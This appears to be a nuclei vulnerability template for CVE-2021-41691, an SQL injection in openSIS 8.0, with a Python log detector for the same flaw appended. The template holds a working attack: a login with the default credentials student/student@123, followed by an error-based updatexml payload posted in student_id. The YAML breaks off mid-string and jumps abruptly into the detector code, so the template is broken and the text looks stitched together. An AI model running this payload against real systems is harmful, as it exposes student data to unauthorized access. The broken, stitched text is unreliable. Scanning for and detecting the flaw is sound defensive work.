id: CVE-2021-41691

info:
  name: openSIS Student Information System 8.0 SQL Injection
  author: Bartu Utku SARP
  severity: high
  description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in a POST request sent to /TransferredOutModal.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).
  reference:
    - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
    - https://www.exploit-db.com/exploits/50637
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
  classification:
    cve-id: CVE-2021-41691
  metadata:
    max-request: 2
  tags: cve,cve2021,sqli,auth,edb,opensis

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
      - |
        POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

    attack: pitchfork
    payloads:
      username:
        - student
      password:
        - student@123

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "
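The template above tells a scanner how to confirm the flaw; the defender-side counterpart is spotting attempts in traffic. The following Python is an added example, not part of this nuclei template or of openSIS: it flags POST requests to /TransferredOutModal.php whose student_id or TRANSFER[SCHOOL] value carries error-based injection primitives (the updatexml/concat/md5 construct from the template's own payload) or generic SQL metacharacters. It assumes a log source that records request bodies (a reverse proxy or WAF audit log, for instance); the sample records are constructed here and are not real log entries.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameters named in the advisory as injectable.
TARGET_PATH = "/TransferredOutModal.php"
SUSPECT_PARAMS = ("student_id", "TRANSFER[SCHOOL]")

# Error-based primitives used by the template's payload, plus generic
# SQL metacharacters. Case-insensitive; tune to your false-positive budget.
SQLI_PATTERN = re.compile(
    r"(updatexml|extractvalue|concat\s*\(|md5\s*\(|union\s+select"
    r"|'|\"|--|/\*|\bor\b\s+\d+\s*=\s*\d+)",
    re.IGNORECASE,
)


def flag_request(path, body):
    """Return the suspect parameter names whose value looks like SQL injection.

    `path` is the request target (query string is ignored for matching),
    `body` is the raw application/x-www-form-urlencoded POST body.
    Requests to other endpoints are never flagged.
    """
    if urlsplit(path).path != TARGET_PATH:
        return []
    # parse_qs percent-decodes keys and values and turns '+' into a space,
    # so an encoded TRANSFER%5BSCHOOL%5D key still matches.
    fields = parse_qs(body, keep_blank_values=True)
    hits = []
    for name in SUSPECT_PARAMS:
        if any(SQLI_PATTERN.search(value) for value in fields.get(name, [])):
            hits.append(name)
    return hits


# Constructed (path, body) records standing in for a body-logging proxy.
SAMPLE_RECORDS = [
    ("/TransferredOutModal.php?modfunc=detail",
     "student_id=42&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5"),
    ("/TransferredOutModal.php?modfunc=detail",
     "student_id=updatexml(0x23,concat(1,md5(999999999)),1)&button=Save"
     "&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5"),
    ("/index.php",
     "USERNAME=student&PASSWORD=student@123&language=en&log="),
    ("/TransferredOutModal.php",
     "student_id=42&TRANSFER%5BSCHOOL%5D=5'+OR+'1'='1&TRANSFER[Grade_Level]=5"),
]


def scan_records(records):
    """Return [(record_index, [flagged_param, ...]), ...] for suspicious records."""
    findings = []
    for index, (path, body) in enumerate(records):
        hits = flag_request(path, body)
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan_records(SAMPLE_RECORDS):
        print(f"record {index}: possible SQLi in {', '.join(hits)}")
```

The path filter matters: the same payload posted to /index.php is ignored, which keeps the rule scoped to the endpoint the advisory describes rather than acting as a generic SQLi signature.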